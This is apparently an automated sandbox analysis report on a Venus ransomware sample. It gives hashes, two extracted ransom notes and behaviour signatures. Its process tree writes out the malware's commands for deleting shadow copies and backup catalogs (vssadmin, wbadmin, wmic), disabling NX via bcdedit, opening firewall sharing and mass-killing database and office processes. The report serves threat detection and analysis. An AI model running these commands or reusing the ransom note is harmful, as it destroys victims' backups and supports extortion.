Analysis

  • max time kernel
    127s
  • max time network
    129s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20221111-en
  • resource tags
    arch:x64
    arch:x86
    image:win10v2004-20221111-en
    locale:en-us
    os:windows10-2004-x64
    system
  • submitted
    18-11-2022 09:06

General

  • Target

    1c45c33e9884cb10264c1a2a0255e72a.exe

  • Size

    225KB

  • MD5

    1c45c33e9884cb10264c1a2a0255e72a

  • SHA1

    1992336a5d752187c979e24a95a871d8932ade6d

  • SHA256

    fa7ba459236c7b27a0429f1961b992ab87fc8b3427469fd98bfc272ae6852063

  • SHA512

    ef8613f273ae04ae61c477ccaf81799f91d38b5f6453ebbdc39c05745cbab927849321f90547982016eefa43574efa1bedc5f90e9c7a5e38b70bc79e442ed9ad

  • SSDEEP

    6144:AeJmXCQwAhozkJQkRV50DErCMxgTw7ozFD254W:AQeCQwARQBD+GcopfW

Malware Config

Extracted

Path

C:\README.html

Ransom Note
<html><head><title>Venus</title><style type = "text/css">*{padding:0;margin:0}p{color:white}.f{background-color:#ff7c00;width:100%;margin-left:auto;margin-right:auto;height:100%}.c h1{color:white;line-height:80px}.r{word-break:break-all;float:left;width:100%;text-align:center}</style></head><body><div class="f"><div class="c"><h1 align="center">&lt;&lt;&lt;Venus&gt;&gt;&gt;</h1></div><div class="r"><p></br></br></br></br><strong>We downloaded and encrypted your data.</strong></br>Only we can decrypt your data.<br><strong>IMPORTANT!</strong><br> If you, your programmers or your friends would try to help you to decrypt the files it can cause data loss even after you pay.<br> In this case we will not be able to help you.<br>Do not play with files.</p><p>Do not rename encrypted files.<br>Do not try to decrypt your data using third party software, it may cause permanent data loss.<br>Decryption of your files with the help of third parties may cause increased price or you can become a victim of a scam.</br>-----------------------------------------------------</br>Contact and send this file to us:<br><strong><br>email:[email protected]<br>email:[email protected]<br>skype live:.cid.2eb1968719a82d39</strong><br><br>qOeN/Ee7Si2K1allYCfgKXW2nzZeNDQAdaIXLViSyyiGb79K17g6nH0rUyun2EPj geXx5pv04zP7pwdjZy2DHVuc12BS36YE7KIBCkxz3+6z+wunSmGZBJIxn7uqvq0a 3tIOwQolyfu3oynf1wt71EvoJldFa9j5SgtxtGxSQuva56PcUv1fEOftB0smJeon poG6VN1GHT6R3QbFu5kpS8gdw/A5F859fogG8EyLkiPdqFwmkAEeBKFKcxV7JCZW GU+u+sunmmZgOLRbL7do5qfSB1/gS4hx23aK2BMygTcfDsHEQrt6fNcCStyMQ6Wy eHFa9sYQ0AJjokJz8LuAEVurWROXMqqFLtgdYQWZd5n/uLOF0n8uz30t4y8iWE0g yyx9BbDGQMI8+Wh9mPkpeogB+fv8w4pMnNO1XT8y00VVKqtXsAt7irda7vFgJ4a5 OmoZ1orLX5PFbpnDFj76xq0+IMIqOvXxrIERP3AuaFwH41KG3sMbAgLWY6nOLQ3o qoY+JQqxqMgxMujx+Ch4lfEWELEBNKBO9xt4x+sciU7L8LqrU6Royl6kmRFZi3EV Bo4L88YzjpU60j7BSrRBVv7x6Kb8tCX02dWrBQtQX+1J11d+Z9HGuj9KYSjc3Bof lbaPBNwrids= </p></div></body></html></html></body></html>
Emails

email:[email protected]

email:[email protected]

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\30986266201972527219.hta

Ransom Note
<<<Venus>>> We downloaded and encrypted your data.Only we can decrypt your data.IMPORTANT! If you, your programmers or your friends would try to help you to decrypt the files it can cause data loss even after you pay. In this case we will not be able to help you. Do not play with files. Do not rename encrypted files. Do not try to decrypt your data using third party software, it may cause permanent data loss. Decryption of your files with the help of third parties may cause increased price or you can become a victim of a scam.-----------------------------------------------------Contact and send this file to us: email:[email protected] email:[email protected] skype live:.cid.2eb1968719a82d39
Emails

email:[email protected]

email:[email protected]

Signatures

  • Venus

    Venus is a ransomware first seen in 2022.

  • Venus Ransomware 5 IoCs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 1 IoCs
  • Deletes backup catalog 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Modifies extensions of user files 6 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Drops desktop.ini file(s) 34 IoCs
  • Enumerates connected drives 3 TTPs 2 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 4 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 1 IoCs
  • Modifies registry class 5 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 53 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\1c45c33e9884cb10264c1a2a0255e72a.exe
    "C:\Users\Admin\AppData\Local\Temp\1c45c33e9884cb10264c1a2a0255e72a.exe"
    1⤵
    • Checks computer location settings
    • Adds Run key to start application
    • Drops file in Windows directory
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:3508
    • C:\Windows\1c45c33e9884cb10264c1a2a0255e72a.exe
      "C:\Windows\1c45c33e9884cb10264c1a2a0255e72a.exe" g g g o n e123
      2⤵
      • Executes dropped EXE
      • Modifies extensions of user files
      • Checks computer location settings
      • Drops desktop.ini file(s)
      • Enumerates connected drives
      • Sets desktop wallpaper using registry
      • Drops file in Program Files directory
      • Drops file in Windows directory
      • Modifies registry class
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1160
      • C:\Windows\System32\cmd.exe
        /C netsh advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1612
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
          4⤵
          • Modifies Windows Firewall
          PID:2116
      • C:\Windows\System32\cmd.exe
        /C taskkill /F /IM msftesql.exe /IM sqlagent.exe /IM sqlbrowser.exe /IM sqlservr.exe /IM sqlwriter.exe /IM oracle.exe /IM ocssd.exe /IM dbsnmp.exe /IM synctime.exe /IM mydesktopqos.exe /IM agntsvc.exe /IM isqlplussvc.exe /IM xfssvccon.exe /IM mydesktopservice.exe /IM ocautoupds.exe /IM agntsvc.exe /IM agntsvc.exe /IM agntsvc.exe /IM encsvc.exe /IM firefoxconfig.exe /IM tbirdconfig.exe /IM ocomm.exe /IM mysqld.exe /IM mysqld-nt.exe /IM mysqld-opt.exe /IM dbeng50.exe /IM sqbcoreservice.exe /IM excel.exe /IM infopath.exe /IM msaccess.exe /IM mspub.exe /IM onenote.exe /IM outlook.exe /IM powerpnt.exe /IM sqlservr.exe /IM thebat64.exe /IM thunderbird.exe /IM winword.exe /IM wordpad.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3328
        • C:\Windows\system32\taskkill.exe
          taskkill /F /IM msftesql.exe /IM sqlagent.exe /IM sqlbrowser.exe /IM sqlservr.exe /IM sqlwriter.exe /IM oracle.exe /IM ocssd.exe /IM dbsnmp.exe /IM synctime.exe /IM mydesktopqos.exe /IM agntsvc.exe /IM isqlplussvc.exe /IM xfssvccon.exe /IM mydesktopservice.exe /IM ocautoupds.exe /IM agntsvc.exe /IM agntsvc.exe /IM agntsvc.exe /IM encsvc.exe /IM firefoxconfig.exe /IM tbirdconfig.exe /IM ocomm.exe /IM mysqld.exe /IM mysqld-nt.exe /IM mysqld-opt.exe /IM dbeng50.exe /IM sqbcoreservice.exe /IM excel.exe /IM infopath.exe /IM msaccess.exe /IM mspub.exe /IM onenote.exe /IM outlook.exe /IM powerpnt.exe /IM sqlservr.exe /IM thebat64.exe /IM thunderbird.exe /IM winword.exe /IM wordpad.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:212
      • C:\Windows\System32\cmd.exe
        /C wbadmin delete catalog -quiet && vssadmin.exe delete shadows /all /quiet && bcdedit.exe /set {current} nx AlwaysOff && wmic SHADOWCOPY DELETE
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:6052
        • C:\Windows\system32\wbadmin.exe
          wbadmin delete catalog -quiet
          4⤵
          • Deletes backup catalog
          PID:6100
        • C:\Windows\system32\vssadmin.exe
          vssadmin.exe delete shadows /all /quiet
          4⤵
          • Interacts with shadow copies
          PID:816
        • C:\Windows\system32\bcdedit.exe
          bcdedit.exe /set {current} nx AlwaysOff
          4⤵
          • Modifies boot configuration data using bcdedit
          PID:6132
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic SHADOWCOPY DELETE
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:268
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\30986266201972527219.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        3⤵
          PID:2064
      • C:\Windows\System32\cmd.exe
        /c ping localhost -n 3 > nul & del C:\Users\Admin\AppData\Local\Temp\1c45c33e9884cb10264c1a2a0255e72a.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4396
        • C:\Windows\system32\PING.EXE
          ping localhost -n 3
          3⤵
          • Runs ping.exe
          PID:3824
    • C:\Windows\system32\wbengine.exe
      "C:\Windows\system32\wbengine.exe"
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:6136
    • C:\Windows\System32\vdsldr.exe
      C:\Windows\System32\vdsldr.exe -Embedding
      1⤵
        PID:3120
      • C:\Windows\System32\vds.exe
        C:\Windows\System32\vds.exe
        1⤵
        • Checks SCSI registry key(s)
        PID:5848
      • C:\Windows\system32\vssvc.exe
        C:\Windows\system32\vssvc.exe
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:5972

Network

MITRE ATT&CK Enterprise v6

Downloads

  • C:\Users\Admin\AppData\Local\Temp\30986266201972527219.hta

    Filesize

    1KB

    MD5

    8103aa0a52830e860d4e8457864e3b99

    SHA1

    9c0ed2ecd13d4fe060f76b9a3687cc113a0bedba

    SHA256

    1da12388514e57bf5e2c3345e7ca3e6b1eba62617a5c27a1db73280e3a1429dc

    SHA512

    69ad2a795c5ea0aa3b7e2d8584b1579c42f59f89bae4c3d608e5046a6ed7ab2d8903fcde3f57dea0845aa919f719b7253d9d8582a85787d0679ca1fa52af7416

  • C:\Windows\1c45c33e9884cb10264c1a2a0255e72a.exe

    Filesize

    225KB

    MD5

    1c45c33e9884cb10264c1a2a0255e72a

    SHA1

    1992336a5d752187c979e24a95a871d8932ade6d

    SHA256

    fa7ba459236c7b27a0429f1961b992ab87fc8b3427469fd98bfc272ae6852063

    SHA512

    ef8613f273ae04ae61c477ccaf81799f91d38b5f6453ebbdc39c05745cbab927849321f90547982016eefa43574efa1bedc5f90e9c7a5e38b70bc79e442ed9ad

  • memory/1160-143-0x0000000000400000-0x000000000043E000-memory.dmp

    Filesize

    248KB

  • memory/1160-142-0x0000000000400000-0x000000000043E000-memory.dmp

    Filesize

    248KB

  • memory/3508-132-0x0000000000400000-0x000000000043E000-memory.dmp

    Filesize

    248KB